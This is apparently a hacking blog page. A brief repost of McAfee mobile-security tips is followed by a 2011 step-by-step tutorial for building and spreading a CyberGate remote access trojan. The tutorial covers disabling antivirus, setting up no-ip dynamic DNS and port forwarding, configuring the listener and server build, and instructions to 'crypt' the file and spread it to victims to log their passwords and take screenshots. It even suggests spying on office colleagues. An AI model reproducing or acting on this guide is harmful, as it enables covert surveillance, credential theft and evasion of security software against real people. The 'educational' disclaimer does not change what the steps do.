Now a days, attackers targets smart phones rather than the Desktop.  The number of malware application for mobile is increasing.  Infected mobile can be used to steal confidential data or  send out expensive text messages without a user’s consent.


Some Top tricks used by attackers:

  • Malicious apps are usually offered for free and being disguised as fun applications such as games, calendar and comedy apps.
  • Download the legitimate application off of one marketplace, insert malware into it and then re-publish it on other marketplaces or sites with a similar name.
In order to stay away from these type of risky application, McAfee released 5 basic Mobile Security Tips.
  1. For the moment, the amount of detected smartphone malware is relatively low compared to malware that targets desktop or laptop PCs; but being aware that it exists is the first step toward protecting yourself and your data.
  2. Research apps and their publishers thoroughly and check the ratings – better to install apps that are broadly used in the market or are recommended by your circle of friends and colleagues.
  3. It is wise to purchase from a well-known, reputable app marketplace, such as Google’s Android Market or Apple’s App Store. One way for Android users to avoid installation of non-market applications is to de-select the “Unknown sources” option in the Applications Settings menu on their device. If the option is not listed, it means your mobile service provider has already done this for you.
  4. When you install an app, you’ll see a list of permissions for services that are granted access to the hardware and software components on your device, like contacts, camera and location. If something in the permissions screen doesn’t look right, don’t install that app! For example, a game or alarm clock app probably doesn’t need to access your contacts or have the ability to transmit that data from your device.
  5. Install antivirus software on your phone. It is a good idea to install an antivirus program when you get a new mobile device before you add any other apps.

Friday, 18 November 2011

CyberGate RAT - Hacking Facebook, Twitter and Email Id's Passwords

CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously getting developed. Using cybergate you can log the victim's passwords and can also get the screen shots of his computer's screen. You can connect o multiple victims in single time. One should no know what is the ip-address of the victims' computers. That is the main benefit. What you have to do is to spread the server file to the vicitms or the people whom you want to infect. Also there is a file manager utility using which you can explore the data of the victim. So, its much exciting, therefore i thought to give a tutorial about it, since it can also be used for constructive purpose i-e you can view the clients of you office or your homies, that what are they doing at computer. Rather they are sincere or not. I am going to show you step by step guide, by creating my own server. I created Hackersthirst to produce awareness among people about general tools usage also.

Steps For creating a successful cybergate server:-

Step 1) I have hosted to cybergate for dowloading to the two locations, as often i get messages that download link is not working.
Download CyberGate:
Download CyberGate From Here

Step 2) Now, It will be better that you temporarily disable your antivirus software. and also other security software if its the case that CyberGate isn't working for you.

Step 3) Set up your account at no-ip.com , If you are already registered that just login. After loging in add a host. Picture Demonstration is given below, since in last post of pro-rat people asked lots of question.

After this, Type your email id here, Like i did:

\
Now, Fill the forum provided with your real preferences or fake :P , Do what you like. After that you will receive a confirmation email in your inbox, Like the one you receive while subscribing to Hackersthirst, Click the confirmation link provided there, and thus you will have an activated and verified account. Login there. Now, What you have to do, is given below in step 4 with pictures!

Step 4) You have to add host, Like this, after getting logged in!


After that, fill like this, Replace with your desired name!


Thats it you are done, with following info:
Host name: anyname.name.org
Host Type: DNS Host (A) , Further leave other fields blank like i did.
Host process is now finished now i am moving to no-ip client.

Step 5) Download no-ip client from here. Download according to your OS, It supports windows, mac or linux. After downloading install the program, And then run it, You will promted to put in your email id along with password which you used to login to the no-ip.com, After loging in, Do what i did in the following screen shot!
Note: Always keep this software opened, Whenever cyper gate is running.
 Thats it, We have done with no-ip.com, Now procees forward with cybergate!

Step 6) Extract The Cybergate archive You Downloaded In The Beginning To Your Desktop! Once Extracted, Open It & Wait 20 Seconds For The Agreement To Pass! When It's Open, Press: Control Center -> Start.
and then press, Control Center -> Options -> Select Listening Ports, After this a popup will appear fill that like this:


Explaining further:
At first, Write "100" In That Little Box And Press The Blue Arrow. Then It Should Appear Under "Active Ports"
Active Ports: The Port You Will Forward Later using modem or uTorrent!
Connections Limit: The Max Amount Of Victims You Can Have.
Connection PW: The Connection Password. Use "123456"
[V] Show Password: (Shows Password)
Once This Is Done, Press "Save"!

Step 7) After this we are going to create the server, Go to, Control Centre -> Build -> Create Server


After adding name, select the name i-e wamiqali and Press forward.Now, Following windows will appear, Fill it like this:



Now, Click ok, It will be added in the list, After that select 127.0.0.1 and click delete. So, that following form will come in front of you:




Note: If You Want To Try The Server On Yourself, Then Delete Both:


- 127.0.0.1:999
- anyname.name.org


And Replace Them With; 127.0.0.1:100 Since 127.0.0.1 Means "Local Computer & LAN Internet"
Step 8) After this move on to the installer tab, and do what i did in the following screen shot:


Well, i think for this section no further explanation is required, things themselves in the screen shot are telling that what they are meant to do.

Step 9) Now move on to the Anti-Debug tab, and follow guideline as shown in the screen shot:

Step 10) Move on to the final tab, that is Create Server. and do what i did!


So, You are done!

Step 11) (There are many ways for this step, You can also google for some other better way) Now you have to port forward, For this purpose, login to your router or modem (Recommended way) and forward the port which you have used while making the cber gate i-e 100, But another quick tweak is this that simply run uTorrent and select Options > Preferences > Connection than enter there in Listening Ports, the value of port you want to be forwarded (e-g 100) than select Apply.After that Exit the uTorrent from the tray of the windows. and go to http://canyouseeme.org/ and check whether port is access-able or not. If its access-able, You will get this message for port 100:
Success: I can see your service on 100.100.200.200 on port (100)
Your ISP is not blocking port 100

What to do if RAT is not Connecting?

Make Sure That....

1) You are properly port-forwarded if using a router.
2) You have the No-IP Client installed and running.
3) Your DNS entries are correctly spelled when building your server.
4) The password in Listening Ports and the password your server uses are identical.
5) You are Listening on the correct ports.
6) Your Firewall is letting connections through on the port you're listening on.
7) Your server is added to excluded files in your Antivirus and Firewall.

Once You've Port Forwarded Your Port: "100" Then Just Get It Crypted And Start Spreading. After that you will surely get some victims But i will surely point out here that don't use this for bad purpose!

Note: All this was for educating my readers, Best4hack is not responsible for company or individual harm caused by it. Also don't use it to hack innocents, As this isn't attitude of hackers.

Related Posts Plugin for WordPress, Blogger...